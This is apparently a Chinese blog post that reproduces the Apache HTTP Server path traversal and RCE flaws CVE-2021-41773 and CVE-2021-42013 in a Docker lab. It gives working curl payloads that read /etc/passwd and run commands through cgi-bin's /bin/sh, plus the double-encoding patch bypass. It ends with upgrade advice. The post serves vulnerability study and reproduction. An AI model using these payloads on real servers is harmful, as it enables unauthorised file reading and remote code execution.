(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现

 0x00 简介

        Apache HTTP Server(HTTPd)是Apache软件基金会的一个开放源代码的网页服务器。

0x01 漏洞概述

Apache HTTP Server目录遍历漏洞CVE-2021-41773

        影响版本:Apache HTTP Server 2.4.49

        该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文件内容,进而导致敏感信息泄露。

Apache HTTP Server目录遍历漏洞CVE-2021-42013

        影响版本:Apache HTTP Server 2.4.50 & Apache HTTP Server 2.4.49        

        该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。

0x02 环境搭建

​
1、git clone https://github.com/blasty/CVE-2021-41773.git

​2、docker-compose build && docker-compose up

0x03 漏洞利用

1、使用POC测试

curl -s --path-as-is "http://ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

 2、使用EXP执行命令

curl -s --path-as-is -d 'echo Content-Type: text/plain; echo;whoami' "http://ip:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现_第1张图片

3、CVE-2021-41773 cve-2021-42013的主要区别

把 /%2e/换成了/.%%32%65/从而绕过了Apache HTTP Server 2.4.50的补丁

(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现_第2张图片

(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现_第3张图片

 0x04 修复方式 

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:

https://httpd.apache.org/download.cgi

你可能感兴趣的:(漏洞复现,apache,html5)